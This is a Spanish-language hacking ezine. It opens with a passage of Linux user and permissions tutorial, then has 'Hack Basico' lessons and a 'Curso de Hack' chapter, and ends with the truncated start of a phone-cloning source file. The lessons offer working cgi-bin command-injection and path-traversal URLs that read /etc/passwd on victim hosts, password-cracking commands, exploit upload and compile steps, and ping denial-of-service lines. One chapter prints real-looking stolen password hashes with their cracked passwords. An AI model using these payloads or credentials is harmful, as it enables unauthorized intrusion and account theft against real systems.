logearse al sistema, el que para ello deber ser validado por el
superusuario. A cada usuario le corresponder lo que se llama "Cuenta" una
cuenta son lo recursos que se le asignan a ese usuario. A su vez cuando el
usuario de loguea, se dice que inicia una sesion.
Para la correcta administracion de los usuarios, tendremos que cargar
toda la informacion que el sistema necesita a fin de identificar como ya
dijimos univocamente a cada uno. La mayoria de esta informacion la
encontraremos en el archivo "passwd" que se encuentra en el directorio
"/etc" a continuacion hago un detalle de esa informacion.
* Nombre de usuario: El nombre de usuario es el identificador unico dado a
cada usuario del sistema. Ejemplos de nombres de usuario son juan, jerez
y mariag. Se puede utilizar letras y digitos junto a los caracteres "_"
(subrayado) y "." (Punto). Los nombres de usuario se limitan normalmente
a 8 caracteres de longitud.
* User ID: El user ID, o UID, es un numero unico dado a cada usuario del
sistema. El sistema normalmente mantiene la pista de la informacion por
UID, no por nombre de usuario.
* Group ID: El group ID, o GID, es la identificacion del grupo del usuario
por defecto. Cada usuario pertenece a uno o mas grupos definidos por el
administrador del sistema.
* Clave: El sistema tambien almacena la clave encriptada del usuario. El
comando passwd se utiliza para poner y cambiar las claves de los usuarios.
* Nombre completo: El "nombre real" o "nombre completo" del usuario se
almacena junto con el nombre de usuario. Por ejemplo, el usuario jperez
se llama "Juan Perez" en la vida real.
* Directorio inicial: El directorio inicial es el directorio en el que se
coloca inicialmente al usuario en tiempo de conexion. Cada usuario debe
tener su propio directorio inicial, normalmente situado bajo /home.
* Shell de inicio: El shell de inicio del usuario es el interprete de
comandos que es arrancado para el usuario en tiempo de conexion. Ejemplos
pueden ser /bin/bash y /bin/tcsh.
Como ya dije el fichero /etc/passwd contiene la informacion anterior
acerca de los usuarios. Cada linea del fichero contiene informacion acerca
de un unico usuario; el formato de cada linea es:
nombre:clave encriptada:UID:GID:nombre completo:dir.inicio:shell
Un ejemplo puede ser:
jperez:Xv8Q981g71oKK:102:100:Juan Perez:/home/jperez:/bin/bash
Como puede verse, el primer campo , "jperez", es el nombre de usuario.
El siguiente campo, "Xv8Q981g71oKK", es la clave encriptada. Las
claves no se almacenan en el sistema en ningun formato legible por el
hombre. Las claves se encriptan utilizandose a si mismas como clave secreta.
En otras palabras, solo si se conoce la clave, esta puede ser desencriptada.
Esta forma de encriptacion es bastante segura.
Algunos sistemas utilizan "claves en sombra" en la que la informacion
de las claves se relega al fichero /etc/shadow. Puesto que /etc/passwd es
legible por todo el mundo, /etc/shadow suministra un grado extra de
seguridad, puesto que este no lo es. Las claves en sombra suministran
algunas otras funciones como puede ser la expiracion de claves;
El tercer campo "102", es el UID. Este debe ser unico para cada
usuario.
El cuarto campo, "100", es el GID. Este usuario pertenece al grupo
numerado 100. La informacion de grupos, como la informacion de usuarios, se
almacena en el fichero /etc/group. El quinto campo es el nombre completo
del usuario. "Juan Perez".
Los dos ultimos campos son el directorio inicial del usuario
(/home/kiwi) y el shell (/bin/bash), respectivamente. No es necesario que el
directorio inicial de un usuario tenga el mismo nombre que el del nombre de
usuario. Sin embargo, ayuda a identificar el directorio.
Como agregar un usuario
Cuando se añade un usuario hay varios pasos a seguir. Primero, se le
debe crear una entrada en /etc/passwd, con un nombre de usuario y UID
unicos. Se debe especificar el GID, nombre completo y resto de informacion.
Se debe crear el directorio inicial, y poner los permisos en el directorio
para que el usuario sea el dueño. Se deben suministrar ficheros de comandos
de inicializacion en el nuevo directorio y se debe hacer alguna otra
configuracion del sistema (por ejemplo, preparar un buzon para el correo
electronico entrante para el nuevo usuario). Aunque todo esto puede ser
hecho a mano es mucho mas sencillo y seguro usar un programa que se provee
con Linux llamado "adduser" este programita nos ira preguntando uno a uno
los datos necesarios y una vez completados se encargara de modificar todos
los archivos necesarios de configuracion y crear los directorios necesarios.
Como borrar un usuario.
Para borrar un usuario nos basta con borrarlo del archivo "passwd" y
eliminar tambien todos sus archivos y directorios. Esto se puede hacer a
mano o usar deluser que es mas seguro. Tambien podemos deshabilitar al
usuario colocando un asterisco en el lugar donde va la clave encriptada.
Aqui es importante saber que el superusuario puede cambiar en
cualquier momento la clave de cualquier usuario, mientras que cada usuario
solo puede cambiar su clave si el root se lo permite. Asi tambien se puede
habilitar a los usuarios para que cambien por ejemplo su shell y puedan
elegir el que mas les guste.
#Capitulo VII
Permisos de Ficheros
Conceptos de permisos de ficheros
Al ser UNIX un sistema multiusuario, para proteger los archivos
importantes del sistema tales como el archivo de claves o ficheros de
usuarios particulares de la manipulacion por parte de otros, UNIX
proporciona un mecanismo conocido como permisos de ficheros. Este mecanismo
permite que ficheros y directorios "pertenezcan" a un usuario en particular.
Por ejemplo, como jperez creo ficheros en su directorio "home", jperez es
el propietario de esos ficheros y tiene acceso a ellos.
UNIX tambien permite que los ficheros sean compartidos entre usuarios
y grupos de usuarios. Si jperez lo desea, podria restringir el acceso a sus
ficheros de forma que ningun otro usuario tenga acceso excepto el root por
supuesto. De cualquier modo, en la mayoria de los sistemas por defecto se
permite que otros usuarios puedan leer tus ficheros pero no modificarlos o
borrarlos.
Como hemos explicado arriba, cada fichero pertenece a un usuario en
particular. Por otra parte, los ficheros tambien pertenecen a un grupo en
particular, que es un conjunto de usuarios definido por el sistema. Cada
usuario pertenece al menos a un grupo cuando es creado. El administrador
del sistema puede hacer que un usuario tenga acceso a mas de un grupo.
Los grupos usualmente son definidos por el tipo de usuarios que
acceden a la maquina. Por ejemplo, en un sistema UNIX de una universidad,
los usuarios pueden ser divididos en los grupos estudiantes, direccion,
profesores e invitados. Hay tambien unos pocos grupos definidos por el
sistema (como bin y admin) los cuales son usados por el propio sistema para
controlar el acceso a los recursos muy raramente los usuarios normales
pertenecen a estos grupos.
Los permisos estan divididos en tres tipos: lectura, escritura y
ejecucion. Estos permisos pueden ser fijados para tres clases de usuarios:
el propietario del fichero, el grupo al que pertenece el fichero y para
todos los usuarios independientemente del grupo.
El permiso de lectura permite a un usuario leer el contenido del
fichero o en el caso de un directorio, listar el contenido del mismo
(usando ls). El permiso de escritura permite a un usuario escribir y
modificar el fichero. Para directorios, el permiso de escritura permite
crear nuevos ficheros o borrar ficheros ya existentes en dicho directorio.
Por ultimo, el permiso de ejecucion permite a un usuario ejecutar el
fichero si es un programa o script del shell. Para directorios, el permiso
de ejecucion permite al usuario cambiar al directorio en cuestion con cd.
Interpretando los permisos de ficheros
Veamos un ejemplo del uso de premisos de ficheros. Usando el
comando ls con la opci¢n -l se mostrara un listado "largo" de los ficheros,
el cual incluye los permisos de ficheros.
-rwxr-xr-x 1 jperez users 505 Mar 13 19:05 archivo
Este fichero pertenece a jperez y al grupo users. Echemos un vistazo
a los permisos. La cadena -rw-r--r-- nos informa, por orden, los tres
primero corresponden al propietario, los que le siguen al grupo y los
ultimos a todos. El primer caracter de la cadena de permisos ("-")
representa el tipo. El "-" significa que es un archivo. Las siguientes tres
letras ("rwx") representan los permisos para el propietario del fichero,
jperez. El "r" para "lectura" y "w" para escritura y "x" para ejecucion.
Los tres caracteres siguientes representan lo permisos del grupo, aqui
vemos que este archivo tiene permisos de lectura y ejecucion del grupo.
Y finalmente los ultimos tres caracteres representan los permisos para
todos los usuarios, tambien de lectura e ejecucion.
Dependencias
Es importante darse cuenta de que los permisos de un fichero tambien
dependen de los permisos del directorio en el que residen. Por ejemplo,
aunque un fichero tenga los permisos -rwxrwxrwx, otros usuarios no podran
acceder a el a menos que tambien tengan permiso de lectura y ejecucion para
el directorio en el cual se encuentra el fichero. Si jperez quiere
restringir el acceso a todos sus ficheros, podria simplemente poner los
permisos de su directorio "home" /home/jperez a -rwx------. De esta forma
ningun usuario podra acceder a su directorio ni a ninguno de sus ficheros o
subdirectorios. Jperez no necesita preocuparse de los permisos individuales
de cada uno de sus ficheros.
En otras palabras, para acceder a un fichero, debes de tener permiso
de ejecucion de todos los directorios a lo largo del camino de acceso al
fichero, ademas de permiso de lectura (o ejecucion) del fichero en
particular.
Habitualmente, los usuarios de un sistema UNIX son muy abiertos con
sus ficheros. Los permisos que se dan a los ficheros usualmente son
-rw-r--r--, lo que permite a todos los dem s usuarios leer los ficheros,
pero no modificarlos de ninguna forma. Los directorios, usualmente tienen
los permisos -rwxr-xr-x, lo que permite que los demas usuarios puedan
moverse y ver los directorios, pero sin poder crear o borrar nuevos
ficheros en ellos.
Muchos usuarios pueden querer limitar el acceso de otros usuarios a
sus ficheros. Poniendo los permisos de un fichero a -rw------- no se
permitir a ningun otro usuario acceder al fichero. Igualmente, poniendo los
permisos del directorio a -rwx------ no se permitir a los demas usuarios
acceder al directorio en cuestion.
Cambiando permisos
El comando "chmod" se usa para establecer los permisos de un fichero.
Solo el propietario puede cambiar los permisos del fichero. La sintaxis de
chmod es: chmod {a,u,g,o}{+,-}{r,w,x} <archivo>
Brevemente, indicamos a que usuarios afecta all, user, group o other.
Entonces se especifica si se estan añadiendo permisos (+) o quit ndolos
(-). Finalmente se especifica que tipo de permiso read, write o execute.
Algunos ejemplos:
chmod a+r archivo
Da a todos los usuarios acceso al fichero.
chmod +r archivo
Como arriba si no se indica "a", "u", "g" u "o" por defecto se toma a.
chmod og-x archivo
Quita permisos de ejecucion a todos los usuarios excepto al
propietario.
chmod u+rwx archivo
Permite al propietario leer, escribir y ejecutar el fichero.
chmod o-rwx archivo
Quita permisos de lectura, escritura y ejecucion a todos los usuarios
menos al propietario y a los usuarios del grupo del fichero.
Los usuarios mas experimentados pueden usar directamente la
nomenclatura octal para asignar o quitar permisos.
Grupos
Como hemos citado anteriormente, cada usuario pertenece a uno o mas
grupos. La unica importancia real de las relaciones de grupo es la
perteneciente a los permisos de ficheros, como dijimos en la seccion 3.9,
cada fichero tiene un "grupo propietario" y un conjunto de permisos de
grupo que define de que forma pueden acceder al fichero los usuarios del
grupo.
Hay varios grupos definidos en el sistema, como pueden ser bin, mail,
y sys. Los usuarios no deben pertenecer a ninguno de estos grupos; se
utilizan para permisos de ficheros del sistema. En su lugar, los usuarios
deben pertenecer a un grupo individual, como users. Si se quiere ser
detallista, se pueden mantener varios grupos de usuarios como por ejemplo
estudiantes, directivos, profesores, soporte y facultad.
El fichero /etc/group contiene informacion acerca de los grupos. El
formato de cada linea es
nombre de grupo:clave:GID:otros miembros
Algunos ejemplos de grupos pueden ser:
root:*:0:
usuarios:*:100:jperez, lmamani
invitados:*:200:
otros:*:250:alumno
El primer grupo, root, es un grupo especial del sistema reservado
para la cuenta root. El siguiente grupo, users, es para usuarios normales.
Tiene un GID de 100. Los usuarios jperez y lmamani tienen acceso a este
grupo. Recuerdese que en /etc/passwd cada usuario tiene un GID por defecto.
Sin embargo, los usuarios pueden pertenecer a mas de un grupo, añadiendo
sus nombres de usuario a otras lineas de grupo en /etc/group. El comando
groups lista a que grupos se tiene acceso.
El tercer grupo, invitados, es para usuarios invitados, y otros es
para "otros" usuarios. El usuario alumno tiene acceso a este grupo.
Como se puede ver, el campo "clave" de /etc/group raramente se
utiliza. A veces se utiliza para dar una clave para acceder a un grupo.
Esto es raras veces necesario. Para evitar el que los usuarios cambien a
grupos privilegiados (con el comando newgroup), se pone el campo de la
clave a "*".
Se pueden usar los comandos addgroup o groupadd para añadir grupos a
su sistema. Normalmente es mas sencillo añadir lineas a /etc/group uno
mismo, puesto que no se necesitan mas configuraciones para añadir un grupo.
Para borrar un grupo, solo hay que borrar su entrada de /etc/group.
#Glosario
* Bugs: Errores en la confeccion de un programa.
* Driver: programa encargado de servir de intermediario entre el sistema
operativo y los distintos dispositivos conectados en el ordenador.
* FAQ: Frecuent Asked Question. Cuestion frecuentemente preguntada.
Recopilacion de preguntas y respuestas sobre las dudas mas
frecuentes.
* FTP: File Transfer Protocol: Protocolo utilizado para la transmision de
ficheros.
* GNU: GNU 's not UNIX. Frase recursiva que representa al proyecto
encargado de la proteccion y creacion de software de libre
distribucion.
* Hacker: En su doble acepcion, persona que posee un nivel muy importante
de conocimientos en Unix, experto. Tambien se dice que un hacker
es aquel que utiliza sus extensos conocimientos de informatica
para "romper" sistemas de seguridad.
* HOWTO: Como ir hacia. como conseguir. Documentacion especifica obre algun
aspecto concreto de Linux (impresoras, redes, UPS, etc.
* Kernel: nucleo. En Linux, parte principal del sistema operativo. Codigo
fuente del propio sistema.
* LDP: Linux Documentacion Project: Proyecto para la Documentacion de Linux.
* LILO: LInux LOader. Cargador de Linux. Pequeño programa que permite el
arranque de uno o varios sistemas operativos situados en una misma
maquina. LILO puede poner en marcha, OS/2, Linux, MS-DOS,
Windows'95, SCO, etc.
* LSM: Linux Software Map. "Mapa" de software para Linux. Base de datos que
recoge la mayor parte del software disponible para Linux, asi como
su autor, descripcion, localizacion, observaciones, etc.
* Mainframe: Ordenador principal. Equipo de muy altas prestaciones, Host.
* NFS: Network Filey System: Sistemas de ficheros en red.
* online on-line: en linea, en conexion. Documentacion on-line: documentos
disponibles a traves de sistemas telematicos.
* script: Guion. Shell script: guion para el procesador de 'ordenes.
Programa batch. Equivalente en Unix a los ficheros BAT de MS-DOS.
* Shell: Interprete de ordenes o comandos. Programa intermediario entre el
sistema operativo y el usuario. Imaginatelo como si fuera el
sustituto del COMMAND.COM de MS-DOS. Linux soporta varias shells
diferentes (bash, ksh, cshell...).
* Stdin: entrada standard; usualmente el teclado.
* Stdout: salida standard; usualmente la pantalla.
* Swap: Intercambio.
* swap space: Area de intercambio. Memoria virtual. Zona de almacenamiento
en disco (fichero o particion) que sirve como prolongacion de
la memoria RAM realmente instalada, permitiendo la ejecucion
de procesos que, de otra forma, requeririan una ampliacion
fisica de dicha RAM.
IMPORTANTE: Todo el material aqui incluido es de libre copia y
distribucion por cualquier medio y soporte siempre que se conserve integro,
en caso de reproduccion parcial se debe citar la fuente. La confeccion de
esta guia corresponde a LeTaL, es fruto de la experiencia personal y de la
recopilacion de documentacion del LDP (Linux Documentation Proyect)
traducida por mi o por el Proyectos LuCas (Lunix en Castellano).
Agradecimientos: A Linus Torvalds. LuCas, S.L.U.G, J.J.F. / HACKERS TEAM.
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
/***********************************\
** **
** HACK BASICO by \Wend|g0 **
** **
** Numero 1 **
** **
\***********************************/
TEMAS:
- Introduccion
- Lista de puertos
- Bugs sobre cgi-bin
- Como empezar a usar el John the Ripper
______________________________________________________________________________
Antes de nada k nadie me confunda con el wendigo perteneciente al SHE,
ya k yo no soy el. En principio estos textos son para gente que komo yo les
gusta este ambiente pero no saben mucho y nadie les ayuda en su aprendizaje.
Que quede muy claro que no quiero dar clases a nadie ya que la mayoria sabe
mas que yo. Lo que opino es que hay mucha gente empezando que no les vendra
mal y se haran una vaga idea de como comenzar. Usea, k si ya sabes algo del
tema pierdes el tiempo leyendo esta serie de txts.
Lo primero que debes hacer para poder entrar en cualquier sistema es
recopilar toda la informacion posible acerca de el.
-Version de sistema
-Version de sendmail (Se saca haciendo un telnet al puerto del sendmail
k es el 25)
-Version del FTP (Puerto 21)
-Ver si exporta direcorios al exterior (Desde linux >Showmount -e host)
etc... Asi sabremos k bug ( fallo de sistema ) explotar.
Para empezar voy a explicar los puertos. Existen numerosos puertos
por los k entrar o interactuar con un host. Para k te kede klaro uno de
los puertos k mas has utilizado es el 80, k es el puerto HTTP (hiper text
transfer protocol). El FTP tambien tiene el suyo propio, el 21. Bueno,
kizas el k mas uses a partir de ahora sea el 23 (TELNET). Aki va una lista
de los puertos mas comunes para utilizar. No son todos pero si algunos de
los mas importantes.
**********************************************
discard 9
netstat 15
chargen 19
ftp 21
telnet 23
smtp (sendmail) 25
rlp 39
bootp 67
fingerk 79
http 80 / 8080
military http 80 / 8080 / 5580
link 87
pop3 110
identd 113
nntp 119
newsk 144
execk 512
login 513
pkill 515
ktalk 517
ntalk 518
netwall 533
rmontior 560
montior 561
kerberos 750
**********************************************
Bueno, y despues de esto diras... y ahora que debo hacer? Pues komo
no es necesario explicarte, supongo k konoceras el tema del /etc/passwd no?,
pues eso, si lo puedes pillar por ftp anonimo hazlo aunke no creo k sea
verdadero, es decir, muy gilipoyas tendria k ser el ROOT. Revisa la version
de sendmail y busca por tu disco duro algun exploit k funcione, ves a URLÔs
komo www.rootshell.com o raregazz.islatortuga.com/utiles.htm y rebusca
hasta pillar alguno. Usa cuentas por defecto, haz "surfeo" o cualkier otra
cosa. Lo k se te pueda okurrir...
Tambien puedes intentar algo muy sencillo k es el PHF. Muchos host no
tienen este bug pero te asombrarias de la cantidad de administradores
penosos k ahi. Ademas, intentalo siempre, no vaya a ser k funcione XDDD.
Abre tu navegador habitual y escribe:
http://aki pon el nombre o IP de tu host
victima/cgi-bin/phf?Query=x%0acat%20/etc/passwd
Con este bug tu puedes usar comandos del UNIX desde tu navegador
mismo. increible, no?
Pero me diras... Y k komandos puedo usar? Pues de momento aprendete
los basicos. Al lado esta la ekivalencia kon los del DOS
dir = ls (-a)archivos okultos
ver = uname -a (version del sistema)
cat = type
cd = cd
cls = clear
Estos komo minimo debes saberlos YA MISMO. Sigamos kon la tecnica
phf. Si te fijas despues de la letra "a" viene el comando cat. Ahi es
donde nosotros debemos empezar a poner nuestras ordenes deseadas. Pero...
Y los espacios? komo los dejamos? Ajaja amigo ... Los espacios los debes
poner komo %20 lo ves mas claro ahora? Ademas puedes usar modificadores
pero ten encuenta siempre estos espacios.
Bueno, te voy a poner una serie mas de bugs por cgi-bin bastante
completita para que vayas jugando un pokillo mas.
http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.victima.com/cgi-bin/php.cgi?/etc/passwd
http://www.victima.com/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
http://www.victima.com/cgi-bin/phf?Qalias=hell%0auname%20-a%0a
http://www.victima.com/cgi-bin/handler/whatever;cat /etc/passwd|?data=Download
http://www.victima.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
http://www.victima.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://www.victima.com/cgi-bin/view-source?../../../../../../../etc/passwd
http://www.victima.com/cgi-bin/phf?Jserver=k%0Acat%20/etc/passwd%0a&Qname=d
http://www.victima.com/cgi-bin/phf?Jserver=k%0Afinger%0a&Qname=d
http://www.victima.com/cgi-bin/nph-test-cgi?/*
Bueno koleguilla... Debes ahora hacerte con un buen crakeador de
pass. El que yo te recomiendo es el Ripper. Segun comparativas es el mas
rapido que existe. Esta repleto de opciones muy interesantes que debes ir
descubriendo por ti mismo. Yo lo uso de dos maneras simples ya k tampoko
necesito mas. La primera es usando diccionarios de palabras k te puedes
bajar de ftpÔs. La segunda es crakearlo a lo bestia usando todas las
posibles combinaciones de palabras. Esto yo lo hago en casos extremos ya
k es un proceso inacabable.
Comandos que puedes usar con el Ripper:
Para usar diccionarios escribe:
john -rules -pwfile:<nombre del fichero> -wordfile:<nombre del diccionario>
" " modo bestia " john -incremental:all -pwfile:<nombre del fichero>
(todo tipo de caracteres)
" " modo bestia " john -incremental:digits -pwfile:<nombre del fichero>
(solo numeros)
" " modo bestia " john -incremental:alpha -pwfile:<nombre del fichero>
(solo letras)
" " modo bestia " john -incremental:capital -pwfile:<nombre del fichero>
(con mayusculas)
john -des -incremental -pwfile:<nombre del fichero>
john -restore (restaura una sesion despues de haber sido cortada)
Esto es todo por ahora. Si te apetece discutirme o preguntarme algo
mi email es wendigo13@hotmail.com
/***********************************\
** **
** HACK BASICO by \Wend|g0 **
** **
** Numero 2 **
** **
\***********************************/
TEMAS:
- Comandos de win95
- Compilar exploits
______________________________________________________________________________
Bueno kolega, ya tienes el ficherito famoso, no?. No me apetece
explicarte k se divide en tantas partes, k la primera es el login, la
segunda el passw... SUPONGO K YA LO SABES. Sino pillate docs en los k se
explica continuamente Y ahora... k hago?. Supongo k habras pillao la
version de sistema y de sendmail, no? pues entonces !!! Hazlo !!!
k no sabes?????
Escribe en el sistema esto: ( en un unix, no en ms-dos XDDDD )
# uname -a
Sencillo, no? Esto te dara la version del SO donde estas metido de
"strangis". Yasta, ahora un exploit k sirva pa este sistema y usalo. Para
usarlos debes subirlos al ordenata k intentas atakar. Yo uso el Ws_ftp pero
si no tienes ninguno incluso puedes usar el k viene con win95. Viene uno
con WIN95 ???? NO JODASSS !!! Pues si. Escribe ftp en alguna ventana
ms-dos y se te cambiara el prompt a ftp>
Luego escribes open host_a_hackear y listo. Asegurate k el exploit k
vas a subir esta en el mismo directorio donde ejecutas el ftp. Aki va una
lista de las ordenes del ftp para poder usarlo sin problemas ...
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
No te voy a explicar pa k sirve cada uno ya k hay algunos k ni lo se.
Ante todo sinceridad XDDDD. Para salir del ftp> escribe Bye y listo y para
subir un exploit u lo k kieras put nombre_del_fichero.
Ufff... Esto kansa bastante, en serio. Personalmente prefiero leer k
escribir :). Mas programillas k existen el el directorio WinDowS (sistema
operativo pseudomultitarea de 16 bits) y k pueden o no ser de utilidad...
TRACERT.EXE Va "trazando" todos los hosts desde el tuyo hasta el
ekipo al k konectas. Pruebalo, es interesante.
PING.EXE Ni k decir tiene pa k sirve. Usado con fines maleficos puede
tirar mucha mas peÒa de la k os creeis. Ahi van algunos pings, no se si
funcionan todos ya k no los he probao. Me los pasaron el otro dia.
ping -l 65510 Atake de DoS "Denial oF Service"
ping -s 1 -f Tira equipos IBM
ping -s ip-del-lamer 1024
Todos no funcionan en windows... :)
NBTSTAT.EXE Jejeje, esta es una de las maneras mas faciles de meterte
en el ordenador de alguien, en serio. Ir probando a ver k konseguis y en el
proximo numero os explicare como meterte en el ordenata de alguien y
dejarlo "acojonao". Funciona kuando alguien tiene alguna carpeta compartida
o mejor aun un disko duro. Ahi es donde entraria la "ingenieria social".
Escribe nbtstat -A ip_del_lamer y edita el archivo hosts.sam poniendo su IP.
ARP.EXE Otra utilidad pa probar XDDD. Sinceramente tengo una vaga
idea de para k sirve asin k si alguien kiere explicarmelo gustosamente
aceptare.
Bueeeeeeno, a lo k ibamos... komo se compila un puÒetero exploit ya
dentro del UNIX.victima.es? Debes usar el gcc y el cc. A menudo te pone en
los exploits la orden pa compilarlo correctamente. La orden normal a no
ser k te digan otra, seria... $ gcc -o exploit exploit.c Asi se te crearia
un archivo ejecutable listo pa hacerlo funcionar. Si no funciona ves
probando con cc o c++ en vez de gcc. No obstante en algunos sistemas te
puedes encontrar con que no "existe" compilador alguno, al menos para el
usuario sin privilegios.
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
- CURSO DE HACK -
CHAPTER VI
Bueno pues ya estamos en la 6 entrega de este cursillo de hack, en
esta entrega he pensado que os explicare el funcionamiento de un crackeador
de password, lo mas seguro es que ya sepais hacerlo, para lo que si pues
ahora repasais y para los que no, ya es hora de aprender :)
Crackeadores de passwords ahi mil, pero por suerte son todos muy
parecidos en el uso, ademas que casi todos los s.o. tienen pero como aqui
nos enfocamos solo en Unix/Linux los otros los daremos de pasada. No creo
necesario incluir una explicacion de la estructura del famoso fichero
/etc/passwd, el cual es el que interesa. Existen muchos documentos por
Internet que explican el fichero passwd, ademas que en este ezine en otros
numeros ya a sido tratado, por lo que recomiendo una pasadita en los
numeros anteriores.
Ahora nos ponemos en accion, supongamos que ya tenemos el fichero
passwd de un servidor cualquiera, hemos copiado el fichero a nuestro HD y
ahora usaremos el crackeador que mas nos guste, como ya he dicho existen
muchos, en este caso usare varios distintos para que veias la diferencia :)
Ejecuto en este caso el John The Ripper, uno de los mas famosos y
como vereis estoy usando la version 1.5 la cual es la ultima.
D:\hacker\john>john
John the Ripper Version 1.5 Copyright (c) 1996-98 by Solar Designer
Usage: //D/HACKER/JOHN/john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES, BSDI, MD5, BF)
-savemem:LEVEL enable memory saving, at LEVEL 1..3
D:\hacker\john>
Como haveis podido notar estoy usando la version MS-DOS,
sencillamente es el s.o. en el cual encontraremos mas crackeadores y ademas
es la forma que mas gente utiliza, por eso prefiero usar el MS-DOS para este
caso pero es igualito que en Unix/Linux.
ahora le damos al John un fichero passwd, pero con la opcion single,
y el resultado sera el siguiente:
D:\hacker\john>john -single echpass
John the Ripper Version 1.5 Copyright (c) 1996-98 by Solar Designer
Loaded 3 passwords with 3 different salts (Standard DES [24/32 4K])
wnnwnn (wnn)
oracle6 (oracle)
guesses: 2 time: 0:00:00:00 100% c/s: 2840 trying: root1958 - r1969
D:\hacker\john>
Podemos apreciar que el John a encontrado 2 cuentas, decir que el
passwd que estoy usando es autentico :) pero posee muy pocas cuenta por lo
que creo que es passwd perfecto para este proposito. La cuenta son las
siguientes:
oracle:vM5OPrBhNOeGY:2000:2000::/opt/oracle:/bin/csh
wnn:WtTIftFaGSXTM:2005:2005::/tmp:/bin/csh
Esto para el que quiera comprobar la autenticidad de los mismos :)
Ahora lo que nos interesa es usar un diccionario con el John ya que asi
podra comparar el diccionario con el passwd y obtener las contraseñas de
las cuenta que coincidan. Y para ello ejecutamos la sigueinte linea:
D:\hacker\john>john -wordfile:password.lst echpass
John the Ripper Version 1.5 Copyright (c) 1996-98 by Solar Designer
Loaded 1 password (Standard DES [24/32 4K])
guesses: 0 time: 0:00:00:00 100% c/s: 2268 trying: sailor - zhongguo
D:\hacker\john>
Y como vemos el John en este caso no a encontrado nada, es logico
ya que ninguna palabra que se usaban en las contraseñas sale en el
diccionario usado, el cual es el propio diccionario que trae el John. Lo
aqui presentado es la forma mas basica, por lo que es recomendable que el
lector realize sus propios experimentos y obtenga sus conclusiones.
Ahora veremos otro famoso crackeador, el cual es conocido como
Guess, y lo ejecutamos nos sale lo siguiente:
D:\crack>guess
GUESS: Unix Password Checker [Version 2.1]
GUESS - Copyright 1991 Christian Beaumont
C_BEAUMONT@UK.AC.LUT.HICOM and Sysop of fidonet node 2:250/301
THIS IS A BETA TEST VERSION FOR PUBLIC DISTRIBUTION
Use: GUESS [PASSWORD_FILE] [[OPTION] [DICTIONARY]] ...
Options are:
-a Perform algorithmic check of password file
-cWORD Catch up to specified word in dictionary
-sWORD Check password file against specifed word only
-uNAME Limit checking of dictionary to a certain user name
-w Permit checking of dictionary to all users
If you find GUESS useful or have any comments please feel free
to contact me.
Christian Beaumont +44-81-883-5683 (home) +44-81-680-1066 (work)
D:\crack>
Como vemos nos sale las diferentes opciones que lleva el programa,
ahora ejecutaremos el Guess con el fichero de contraseñas de la siguiente
manera:
D:\crack>guess echpass -a
Reading password file ...
ENTRIES 19
BROKEN 0
UNBROKEN 3
PERCENT BROKEN 0
Initialising tables
Performing algorithmic check
wnn is wnnwnn
6 guesses in 0 seconds (109 guesses/sec 1 clocks)
D:\crack>
Como podemos apreciar solo a encontrado una cuenta, la cual es "wnn",
aqui vemos una diferencia entre el Guess y el John. Como siempre lo mejor
es usar un diccionario, pero si fuese el caso que consegueis un fichero
passwd de un pais extranjero, lo logico es que useis un diccionario en
ese idioma, ya que asi conseguireis averiguar mas cuentas. Un buen sitio
para pillar diccionarios es el siguiente url:
http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html
Para que luego digan que no aprovechamos los recursos de la NCSA :)
Y ahora un pongo una lista con los diferentes crackeadores que os podreis
encontrar en Internet o en nuestra seccion de CRACK.
Nombre Plataforma
------ ----------
# Crack Unix\Dos
# CrackerJack Unix\Dos\Os/2
# PaceCrack95 Windows
# Qcrack Dos\Windows
# John the Ripper Unix\Dos\Windows
# Pcrack Unix
# Hades Dos
# Star Cracker Dos
# Killer Cracker Unix
# Hellfire Cracker Dos
# Xit Dos
# Claymore Windows
# Guess Dos
# PC Unix Password Cracker Dos
# Merlin Unix
Por si no queda lo suficientemente claro todos estos crackeadores
solo sirven para los ficheros /etc/passwd de Unix, la plataforma, es en el
sistema operativo la cual corren estos programas.
Para conseguir una gran variedad de crackeadores lo mejor es pasar
por nuestra seccion de CRACK, en la cual podras bajarte muchos, incluido
el John. En caso que algo no haya quedado claro, pues en envias un mail
y lo solucionare en el proximo numero :)
Byes all y hasta la vista !!
CONDE VAMPIRO
- J.J.F. / HACKERS TEAM -
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
\-------------------------------/
\ CLONANDO MOVILES DEL CCC /
\-----------------------/
NOTA DE - J.J.F. / HACKERS TEAM - : Todo este codigo fuente fue
obtenido en el website del CCC (Chaos Computer Club). Un conocido grupo de
hackers alemanes. Por lo que no nos hacemos responsables del mal uso del
material aqui expuesto. Este codigo es para sistemas operativos Linux.
http://www.ccc.de
File : getresponse.cc
------------ Codigo Fuente ---------------------------------------------------
#include "getresponse.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>
#define private private_hack
extern "C" {
#include <sio.h>
#include <sct0.h>
#include <sc.h>
}
#undef private
int timeout;
SIO_INFO* si;
